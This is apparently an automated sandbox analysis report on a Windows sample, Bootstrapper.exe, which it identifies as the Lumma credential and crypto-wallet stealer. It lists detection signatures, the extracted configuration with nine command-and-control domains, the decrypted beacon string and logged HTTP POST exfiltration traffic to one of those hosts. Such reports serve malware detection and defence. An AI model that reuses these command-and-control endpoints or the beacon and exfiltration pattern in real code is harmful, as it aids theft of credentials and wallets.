
Windows Analysis Report
Bootstrapper.exe

Overview

General Information

Sample name: Bootstrapper.exe
Analysis ID: 1589391
MD5: a9370df5fb60672577fd727e3e798e75
SHA1: a5b4a8c7caf397a3629e0156da2594de1b657776
SHA256: 481a9e582ab314faa2ab950fc99ab39fc35c071bfaf45871089892129be66d55
Tags: exe, user-zhuzhu0009

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Bootstrapper.exe (PID: 1036 cmdline: "C:\Users\user\Desktop\Bootstrapper.exe" MD5: A9370DF5FB60672577FD727E3E798E75)
    • WerFault.exe (PID: 3512 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 1900 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["savorraiykj.lat", "washyceehsu.lat", "kickykiduz.lat", "jubbenjusk.biz", "miniatureyu.lat", "bloodyswif.lat", "finickypwk.lat", "shoefeatthe.lat", "leggelatez.lat"], "Build id": "HpOoIh--2a727a032c4d"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security
00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Smokeloader_3687686f | unknown | unknown | 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.2339254428.0000000000802000.00000040.00000020.00020000.00000000.sdmp | Windows_Trojan_RedLineStealer_ed346e4c | unknown | unknown | 0x14f8:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
Process Memory Space: Bootstrapper.exe PID: 1036 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security
Process Memory Space: Bootstrapper.exe PID: 1036 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Process Memory Space: Bootstrapper.exe PID: 1036 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security

No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-12T07:10:18.418393+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49710 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:19.439977+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49711 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:20.812997+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49712 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:22.083957+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49714 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:23.471175+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49721 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:25.479834+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49737 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:26.543060+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49743 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:27.536844+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.6 | 49749 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:18.931017+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49710 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:19.934991+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49711 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:27.969739+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6 | 49749 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:18.931017+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6 | 49710 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:19.934991+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6 | 49711 | 172.67.219.181 | 443 | TCP
2025-01-12T07:10:21.395869+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6 | 49712 | 172.67.219.181 | 443 | TCP

AV Detection

Source: Bootstrapper.exe | Avira: detected
Source: 0.2.Bootstrapper.exe.400000.0.raw.unpack | Malware Configuration Extractor: LummaC {"C2 url": ["savorraiykj.lat", "washyceehsu.lat", "kickykiduz.lat", "jubbenjusk.biz", "miniatureyu.lat", "bloodyswif.lat", "finickypwk.lat", "shoefeatthe.lat", "leggelatez.lat"], "Build id": "HpOoIh--2a727a032c4d"}
Source: Bootstrapper.exe | Virustotal: Detection: 50%
Source: Bootstrapper.exe | ReversingLabs: Detection: 39%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Bootstrapper.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: finickypwk.lat
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: shoefeatthe.lat
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: savorraiykj.lat
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: kickykiduz.lat
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: miniatureyu.lat
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: leggelatez.lat
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: washyceehsu.lat
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: bloodyswif.lat
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: jubbenjusk.biz
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2339621633.0000000002190000.00000040.00001000.00020000.00000000.sdmp | String decryptor: HpOoIh--2a727a032c4d

Compliance

Source: C:\Users\user\Desktop\Bootstrapper.exe | Unpacked PE file: 0.2.Bootstrapper.exe.400000.0.unpack
Source: Bootstrapper.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\Bootstrapper.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49721 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.67.219.181:443 -> 192.168.2.6:49749 version: TLS 1.2

Networking

Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 172.67.219.181:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 172.67.219.181:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49711 -> 172.67.219.181:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 172.67.219.181:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49712 -> 172.67.219.181:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49749 -> 172.67.219.181:443
Source: Malware configuration extractor | URLs: savorraiykj.lat
Source: Malware configuration extractor | URLs: washyceehsu.lat
Source: Malware configuration extractor | URLs: kickykiduz.lat
Source: Malware configuration extractor | URLs: jubbenjusk.biz
Source: Malware configuration extractor | URLs: miniatureyu.lat
Source: Malware configuration extractor | URLs: bloodyswif.lat
Source: Malware configuration extractor | URLs: finickypwk.lat
Source: Malware configuration extractor | URLs: shoefeatthe.lat
Source: Malware configuration extractor | URLs: leggelatez.lat
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 172.67.219.181:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49711 -> 172.67.219.181:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49714 -> 172.67.219.181:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49743 -> 172.67.219.181:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49721 -> 172.67.219.181:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49737 -> 172.67.219.181:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 172.67.219.181:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49749 -> 172.67.219.181:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: jubbenjusk.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 86 | Host: jubbenjusk.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=TB978WPRBRX | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12824 | Host: jubbenjusk.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=KF9G91EFC | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15058 | Host: jubbenjusk.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=ZSLO3EWW2 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19916 | Host: jubbenjusk.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=BD17OYCX7FQFJZ65XN | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1376 | Host: jubbenjusk.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=TPXM9QB19SRT6UAF | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1106 | Host: jubbenjusk.biz
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 121 | Host: jubbenjusk.biz
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: jubbenjusk.biz
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: jubbenjusk.biz
Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: Bootstrapper.exe, 00000000.00000003.2278052852.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266468578.0000000000890000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218919187.0000000000890000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2289039973.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278363178.0000000000890000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266368056.0000000000876000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.microh
Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: Amcache.hve.4.dr | String found in binary or memory: http://upx.sf.net
Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: Bootstrapper.exe, 00000000.00000003.2246737656.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: Bootstrapper.exe, Bootstrapper.exe, 00000000.00000003.2268075830.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2289217054.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278052852.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266262477.00000000008D3000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278322139.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2288842178.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266314532.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2279169456.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2279121154.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278187542.00000000008D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/
Source: Bootstrapper.exe, 00000000.00000003.2260094816.0000000002EFE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/2YmA
Source: Bootstrapper.exe, 00000000.00000003.2268075830.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266262477.00000000008D3000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2266314532.00000000008D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/Gsw
Source: Bootstrapper.exe, 00000000.00000002.2339295599.0000000000876000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/Li
Source: Bootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/S
Source: Bootstrapper.exe, 00000000.00000003.2232704430.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2232633454.0000000002EFB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/Y
Source: Bootstrapper.exe, Bootstrapper.exe, 00000000.00000003.2289217054.00000000008EC000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278052852.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278322139.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218919187.0000000000890000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2289039973.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278187542.00000000008D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/api
Source: Bootstrapper.exe, 00000000.00000003.2278052852.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278322139.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2278187542.00000000008D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/api1vk
Source: Bootstrapper.exe, 00000000.00000003.2278322139.00000000008EC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/apims
Source: Bootstrapper.exe, 00000000.00000002.2339295599.0000000000876000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/apit
Source: Bootstrapper.exe, 00000000.00000003.2218862146.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2218781090.0000000000876000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/f
Source: Bootstrapper.exe, 00000000.00000003.2245574445.0000000002EFC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/isg8orLIezaCPJdZDugx
Source: Bootstrapper.exe, 00000000.00000003.2244666049.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/isg8orLIezaCPJdZDugxu
Source: Bootstrapper.exe, 00000000.00000003.2218728998.00000000008D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/q
Source: Bootstrapper.exe, 00000000.00000003.2289217054.00000000008DE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz/w
Source: Bootstrapper.exe, 00000000.00000003.2244898752.0000000002F01000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2289039973.0000000000876000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000002.2339295599.0000000000855000.00000004.00000020.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2244666049.0000000002EF7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://jubbenjusk.biz:443/api
Source: Bootstrapper.exe, 00000000.00000003.2248201712.0000000003012000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: Bootstrapper.exe, 00000000.00000003.2248201712.0000000003012000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: Bootstrapper.exe, 00000000.00000003.2220478699.0000000002F43000.00000004.00000800.00020000.00000000.sdmp, Bootstrapper.exe, 00000000.00000003.2220393780.0000000002F45000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: Bootstrapper.exe, 00000000.00000003.2248103085.0000000002F27000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.or
Source: Bootstrapper.exe, 00000000.00000003.2248201712.0000000003012000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: Bootstrapper.exe, 00000000.00000003.2248201712.0000000003012000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: Bootstrapper.exe, 00000000.00000003.2248201712.0000000003012000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
